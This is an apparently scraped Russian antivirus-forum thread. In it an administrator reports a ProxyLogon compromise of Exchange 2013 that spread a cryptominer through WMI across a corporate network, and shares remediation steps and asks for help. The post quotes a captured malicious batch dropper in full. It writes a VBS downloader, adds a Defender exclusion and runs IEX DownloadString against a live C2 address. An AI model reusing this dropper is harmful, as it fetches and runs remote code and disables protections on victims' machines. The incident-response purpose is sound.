zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_THEME_DEFAULT._PA_PVFA.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_0EXSSJHG.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_2X1TGTE0.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_2ZYUFYVK.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_BZJN21B2.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_DPLFNAEX.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_FHHKYG34.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_FRZ2LSJQ.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_HHL3EFGE.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_LUOS5NMH.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_MT1YTSHN.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\8E05B027\E164D61B\APP_WEB_O5BJKYBG.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_OCV4TGXS.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_QDEJ0KXZ.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_WKYXHA1V.DLL
czoo
QUIT
=============
без перезагрузки
архив из каталога uVS (по формату: ZOO_гггг-мм-дд_чч-мм-сс.rar/7z)  отправить в safety@chklst.ru
------------
04.09.2021 15:48:47, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113034/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113034/ Sat, 04 Sep 2021 15:48:47 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.
Сообщение получилось объемное, могу условно разделить его на несколько логических частей:

1. Суть инцидента (рабочая версия)
2. Описание проявлений и обнаружения
3. Предполагаемая схема лечения хостов сети (в процессе дополнения)
4. Описание и вопрос по лечению "ворот" атаки (почтовый сервер)
5. Дополнительная информация: ссылки на статьи по теме, логи детектов вирусной активности с зараженных машин

1. Суть инцидента (рабочая версия):

Воспользовавшись цепочкой уязвимостей ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065) на необновленном почтовом сервере (отсутствовал мартовский патч безопасности) злоумышленники через открытый 443 порт обошли аутентификацию на сервере Exchange и получили возможность для удаленного запуска произвольного кода.
На сервер был загружен первичный веб-шелл для дальнейшего развития атаки и скомпрометированы пароли, в частности пароль локального администратора, который на всех хостах сети был одинаковый.

После осуществилось заражение хостов корпоративной сети вирусом-майнером. Антивирусы определяют его как:
  • HEUR:Trojan.Multi.GenAutorunSvc.ksws    [Каspersky Security for Windows Server]
  • Trojan.Multi.GenAutorunWMI.a, Trojan.Multi.GenAutorunReg.c, PDM:Trojan.Win32.Generic    [Kaspersky Cloud на клиентских машинах]
  • PowerShellMulDrop.129 + PowerShellDownLoader.1452    [DrWeb CureIT]
Есть подозрение, что зловред сканирует сеть и, используя удалённое управление посредством WMI, заставляет удаленную машину скачивать с интернета и выполнять скрипты Powershell. Возможно при этом еще используется psexec.exe и уязвимость SMBv1, но это не точно.

Заражает машины с Windows 7, Server 2008, Server 2012, как физические, так и виртуальные. Компы с WinXP и Server2003 вирусу пока не интересны.
Корпоративная сеть: несколько территориально разнесенных филиалов (соединены vpn-туннелями по топологии "звезда"), два независимых леса AD и ряд не входящих не в один домен серверов/клиентских машин.
Заразились хосты как состоящие в доменах, так и вне их (скорее всего из-за того, что пароль локального администратора на всех хостах был одинаковый).

2. Описание проявлений и обнаружения

Если антивирус на машине не стоит, то загрузка процессоров под 100% процессами schtasks.exe и несколькими powershell.exe
Если антивирус установлен (например, Касперский), то в логах "Мониторинг активности" содержатся регулярные записи об обнаружении/запрещении зловреда:

Пользователь: NT AUTHORITY\система
Тип пользователя: Системный пользователь
Название: PDM:Exploit.Win32.Generic
Путь к объекту: c:\windows\system32
Имя объекта: cmd.exe
и
Путь к объекту: c:\windows\system32\wbem
Имя объекта: wmiprvse.exe

На пролеченных серверах с установленным Каspersky Security for Windows Server ситуация аналогичная: нагрузка отсутствует, но установленный антивирус периодически режет попытки вылезти в интернет:

Событие: Обнаружен веб-адрес.
Объект: http://fastrepunicat.spdns.org:8000/in6.ps1 (или http://45.10.69.139:8000/in6.ps1)
Имя процесса: wmiprvse.exe

Так же на ряде компов в автозагрузке было обнаружена строка c:\windows\temp\sysupdater0.bat
Антивирус при обнаружении этот файл обычно казнит (У программы обнаружено подозрительное поведение, характерное для вредоносной программы:
Обнаружено: PDM:Trojan.Win32.Generic), но удалось раздобыть один, вот содержимое:

etlocal EnableDelayedExpansion & for /f "tokens=2 delims=.[" %%i in ('ver') do (set a=%%i)&if !a:~-1!==5
(
   @echo on error resume next>%windir%\11.vbs&
   @echo Set ox=CreateObject^("MSXML2.XMLHTTP"^)>>%windir%\11.vbs&
   @echo ox.open "GET","http://45.10.69.139:8000/info.vbs",false>>%windir%\11.vbs&;
   @echo ox.send^(^)>>%windir%\11.vbs&
   @echo If ox.Status=200 Then>>%windir%\11.vbs&
   @echo Set oas=CreateObject^("ADODB.Stream"^)>>%windir%\11.vbs&
   @echo oas.Open>>%windir%\11.vbs&
   @echo oas.Type=1 >>%windir%\11.vbs&
   @echo oas.Write ox.ResponseBody>>%windir%\11.vbs&
   @echo oas.SaveToFile "%windir%\info.vbs",2 >>%windir%\11.vbs&
   @echo oas.Close>>%windir%\11.vbs&
   @echo End if>>%windir%\11.vbs&
   @echo Set os=CreateObject^("WScript.Shell"^)>>%windir%\11.vbs&
   @echo os.Exec^("cscript.exe %windir%\info.vbs"^)>>%windir%\11.vbs&
   cscript.exe %windir%\11.vbs
)
else
(
   setlocal DisableDelayedExpansion&powershell "Add-MpPreference -ExclusionProcess
   'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe';
   [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
   $aa=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ))
   ;if(($aa -eq $null) -or !$aa.contains('SCM Event8 Log'))
   {
       if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64'))
       {
           IEX(New-Object Net.WebClient).DownloadString('http://45.10.69.139:8000/in6.ps1')
       }
       else
       {
           IEX(New-Object Net.WebClient).DownloadString('http://45.10.69.139:8000/in3.ps1')
       }
   }"
)

3. Предполагаемая схема лечения хостов сети (в процессе дополнения):

  1. На пограничных с интернетом устройствах запретить обращение извне на порт 8000 и адреса из диапазона 23.236.64.0-23.236.79.255 45.10.0.0 - 45.10.255.255
  2. Групповыми политиками в разделах "Компьютер" и "Пользователь" запретить выполнение .js, .ps1, .vbs, .wsc, .wsf, .wsh, .bat, .jse, .pif, .scr. Запрещено не только в политике домена, но и локально на машинах, которые в домен не входят
  3. Антивирусная проверка: сначала утилитами Drweb CurIT и/или KVRT, после проведения работ - установленным Касперским
  4. Смена пароля локального админа. Для каждого филиала свой пароль, различается для клиентов и серверов.
  5. Очистка папок C:\Windows\Temp и c:\Users\%username\AppData\Local\Temp\
  6. Очистка точек восстановления
  7. Ревизия автозагрузки при помощи autoruns (sysinternals) - на некоторых хостах был прописан sysupdater0.bat
  8. Установить все возможные обновления ОС. Патчи CVE-2019-0859 и MS17-010 ставились вручную.
  9. Сменить пароль доменного администратора
  10. Провести ревизию "левых" пользователей в домене, в приоритете в привилегированных группах
Отдельная сноска про смену пароля локального администратора на хостах: если пароль не сменить, то проверка и патчи не помогают. Пример: после пролечивания двумя утилитами подряд, установки патчей и полной проверки компьютера, доложившей об отсутствии угроз, этот же компьютер чуть позже уведомил, что в системной памяти обнаружен Trojan.Multi.GenAutorunReg.c.

Данные пункты были осуществлены в двух филиалах, после чего в логах антивируса на хостах этих филиалов прекратились детекты зловредов и попыток вылезти в интернет.

Есть еще ряд пунктов, которые посоветовали неравнодушные люди, но я их еще не обкатывал на практике, поэтому приводить в данном сообщении не буду.
После проверки отпишусь в теме и дополню алгоритм решения инцидента.

Пока могу упомянуть следующее: на зараженных хостах, с которых было зафиксировано обращение по вредоносным адресам, обнаружены службы с произвольными именами (например LFRJLAFYBRJFQEBBLCCB или YVRDGSBWEDTLLHHLUKXW).
Есть мнение, основное заражение происходит через wmi подписки и классы, а они уже раскатывают все остальные службы и т.п.
В системе зафиксированы вредоносные классы в корне root\default и root\Subscription.
В результате антивирусной проверки Касперский должен их удалять, но случается так, что по каким-то причинам вредонос остаётся.

Команды по поиску и удалению вредоносных классов (запускаются в PowerShell, должны подходить для всех ОС с powershell 2.0 и выше):

Get-WmiObject -Namespace root\Default -List | where {$_.Name -eq'systemcore_Updater'} | Remove-WmiObject -Verbose

Если после лечения все равно все равно детекты или не удаление:
  • Имя объекта: WMI-Consumer:SCM Event8 Log Consumer
  • Имя объекта: WMI-Consumer:SCM Event8 Log Consumer2
Команды удаления:
  • Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Log Filter'" | Remove-WMIObject  -Verbose
  • Get-WMIObject -Namespace root\Subscription -ClassCommandLineEventConsumer -Filter "Name='SCM Events Log Consumer'" |Remove-WMIObject -Verbose
  • Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Log Filter2'" | Remove-WMIObject  -Verbose
  • Get-WMIObject -Namespace root\Subscription -ClassCommandLineEventConsumer -Filter "Name='SCM Events Log Consumer2'" |Remove-WMIObject -Verbose
Планирую эти команды прокатать на всех хостах организации, для душевного спокойствия.

4. Описание и вопрос по лечению "ворот" атаки (почтовый сервер)

Остался ключевой момент - почтовый сервер, с которого предположительно всё началось и на котором до сих пор сидит зловред.
Машина с Windows Server 2012r2 Exchange 2013 (version 15.0 (build 1497.2)).
Установлен Каspersky Security for Windows Server, на днях установили мартовский патч безопасности Exchange Server 2013 Cumulative Update 23.
Казалось бы, уязвимость закрыта и можно выдохнуть.
Но нет.

Касперский в журнале безопасности каждые три часа пишет о семи файлах-вредоносах -  одна dll, семь aspx.
При запуске быстрой проверки или полной проверки антивирус их не находит.
И команда PowerShell их не находит.
Из чего можно предположить, что они по команде/расписанию возникают, а в процессе активности их гасит антивирус.
Значит, их команда на их "зарождение" прописана где-то в системе.

В рамках диагностики на почтовике скачали и запустили скрипт, который ищет в логах события с потенциальным пробивом и левые записи в конфигурации, которые могут быть этим источником создания вредоносных файлов.

https://github.com/microsoft/CSS-Exchange/blob/main/Security/src/Test-ProxyLogon.ps1
Команда:
.\Test-ProxyLogon.ps1 -OutPath $home\desktop\logs\
Результат команды:
[CVE-2021-26855] Suspicious activity found in Http Proxy log

Получается, что либо патч уязвимость не закрыл, либо встал криво, либо я не знаю что.
Еще из странностей, связанных с почтовиком:
  1. Несостыковка номера версии патча, установленного в системе (15.0.1497.2) с тем, который по идее должен был быть (15.01.1497.23). На сайте Микрософта указано, что версия "15.0.1497.2" от 18.06.2019, а "15.01.1497.23" - от 13.07.2021. На всякий случай вчера скачали новый файл, уже по другой ссылке Микрософт, в свойствах файла на вкладке "Подробно" указано "Security Update for Exchange Server 2013 Cumulative Update 23 (KB5004778)15.0.1497.23. Запустили установку (не удаляя предыдущий патч), прошла без вопросов, перезагрузили - номер версии остался без изменений. Чудеса в решете.
  2. Не запускается оснастка Exchange Toolbox. Пишет "Консоль управленич (MMC) обнаружила ошибку оснастки, поэтому оснастка будет выгружена", следующее окно "Необрабатывемое исключение в оснастке управляемого..." Очистка кэша оснастки (AppData\Roaming\Microsoft\MMC\Exchange Toolbox) не помогает.
А теперь, собственно, суть обращения: как забороть зловреда на почтовике?
Что-то я упускаю из вида, а что - непонятно.
Заранее благодарю.

Сообщения о детектах из Журнала Касперского с почтового сервера:

Обнаружен возможно зараженный объект: Троянская программа HEUR:Backdoor.MSIL.Webshell.gen.
Имя объекта: App_Web_r0zdr.aspx.f5dba9b9.d7wo2roq.dll
MD5 хеш файла: e91aa8fb8225d5e019311d67774f1946
Хеш SHA256 файла: e3614efab364abe01dd98d92e61d6a73decc9ad87e9d6ce14059581e4ca4­ccc2

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: log.aspx
MD5 хеш файла: f0520236bf9c8c73f199a244d029a49f
Хеш SHA256 файла: 264f9bf852f2c00eb804050861da39b78c1720dc5f77e08dc484dde0a854­30eb

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: RXT7WB.aspx
MD5 хеш файла: c2b67fb32ef0953722ea437295be386b
Хеш SHA256 файла: b4d02ac0e79ca6376416f52c30a82d8b72efcb8966640f3dbf5b22f67e60­75b9

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: dgFfuh.aspx
MD5 хеш файла: 0418b10fdf926066fa6a19e83332e34e
Хеш SHA256 файла: 59720c4ae289ab2a8336a1cd24fbfb2a24478e1ed88d517725999751e510­b97a

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: 7r3q2.aspx
MD5 хеш файла: dbb0576553870e07f8220386b5989cdb
Хеш SHA256 файла: 6377ada51e66550bafda31038897ed13be71f928dabbefd657a1d3b8be67­2237

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: log.aspx
MD5 хеш файла: f0520236bf9c8c73f199a244d029a49f
Хеш SHA256 файла: 264f9bf852f2c00eb804050861da39b78c1720dc5f77e08dc484dde0a854­30eb

5. Дополнительная информация: ссылки на статьи по теме, логи детектов вирусной активности с зараженных машин

Злоумышленники активно эксплуатируют уязвимости в MS Exchange
https://www.kaspersky.ru/blog/exchange-vulnerabilities/30228/

Handling a distributed cryptominer AD worm
https://www.certego.net/en/news/handling-a-destributed-cryptominer-ad-worm/

Далее привожу примеры из журналов безопасности антивирусов в качестве дополнительной информации и для индексации поисковых систем, т.к. в процессе поиска причин и вариантов решения я внятного алгоритма решения не нашел. Возможно найденные варианты решения окажутся полезными кому-нибудь еще.

Если на зараженной машине, на которой не стоит антивирус, запустить DrWeb CureIT, то обнаруживаются обычно следующие угрозы (пример с конкретной машины):

Объект: powershell.exe
Угроза: PowerShellDownLoader.1452
Путь: \Process\4288\Device\HarddiskVolume2\Windows\System32\Window­sPoweShell\v1.0\powershell.exe

Объект: CommandLineTemplate
Угроза: PowerShellMulDrop.129
Путь: \WMI\root\subscription\CommandLineEventConsumer{266c72e5-62e8-11d1-ad89-00c04fd8fdff}\CommandLineTemplate

powershell.exe может быть несколько, CommandLineTemplate обычно один.
После пролечивания утилитой DrWeb CureIT "паразитные" процессы исчезают, но через какое-то время снова происходит заражение и последующая загрузка мощностей машины.

В рамках борьбы с заражением на сервера установлены Каspersky Security for Windows Server 11.0.1.897
После установки, активации, обновления баз и включения KSN запускалась "Проверка важных областей" с настройками "по умолчанию" (Действия над зараженными и другими обнаруженными объектами: Выполнять рекомендуемое действие).
Находилось следующее:

Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunSvc.ksws.
Имя объекта: WMIService:BVMFJGIVCEOAWSUOYQTH

После последующей перезагрузки сервера в диспетчере задач всё выглядит прилично и "лишние" процессы не грузят систему.
Но в "Событиях" задачи "Постоянная защита файлов" постоянно появляются блоки новых записей с пометкой "Уровень важности: Критический".

Блок сообщений с одного из серверов:

Время: 26.08.2021 2:06:54
Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunWmi.ksws.
Имя объекта: WMI-Consumer:SCM Event8 Log Consumer

Время: 26.08.2021 2:06:55
Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunWmi.ksws.
Имя объекта: WMI-Consumer:SCM Event8 Log Consumer2

Время: 26.08.2021 2:50:51
Обнаружен веб-адрес.    .
Имя объекта: http://45.10.69.139:8000/in6.ps1
Компьютер: network
Пользователь: KR-TERM\Администратор
Имя процесса: wmiprvse.exe

Время: 26.08.2021 6:55:28
Обнаружен веб-адрес.    .
Имя объекта: http://45.10.69.139:8000/in6.ps1
Компьютер: network
Пользователь: KR-TERM\Администратор
Имя процесса: wmiprvse.exe

На других серверах дополнительно появлялись сообщения с другими пользователями и процессом:

Обнаружен веб-адрес.    .
Имя объекта: http://45.10.69.139:8000/in6.ps1
Компьютер: localhost
Пользователь: WORKGROUP\FIL-T2$
Имя процесса: services.exe

Процесс терминирован: обнаружена попытка эксплуатации уязвимости. Причина: в защищаемом процессе другой процесс создал поток управления.
Имя объекта: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Компьютер: VIRTUALMACHINE
Пользователь: VIRTUALMACHINE\Администратор
Имя процесса: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Обнаружен объект: Троянская программа Trojan.Win32.Shelma.arzd.
Имя объекта: C:\Windows\System32\mue.exe
MD5 хеш файла: d1aed5a1726d278d521d320d082c3e1e
Хеш SHA256 файла: 0a1cdc92bbb77c897723f21a376213480fd3484e45bda05aa5958e84a7c2­edff
Компьютер: network
Пользователь: VIRTUALMACHINE\Администратор
04.09.2021 15:05:23, Mr Burila.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113033/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113033/ Sat, 04 Sep 2021 15:05:23 +0300 Обнаружение вредоносного кода и ложные срабатывания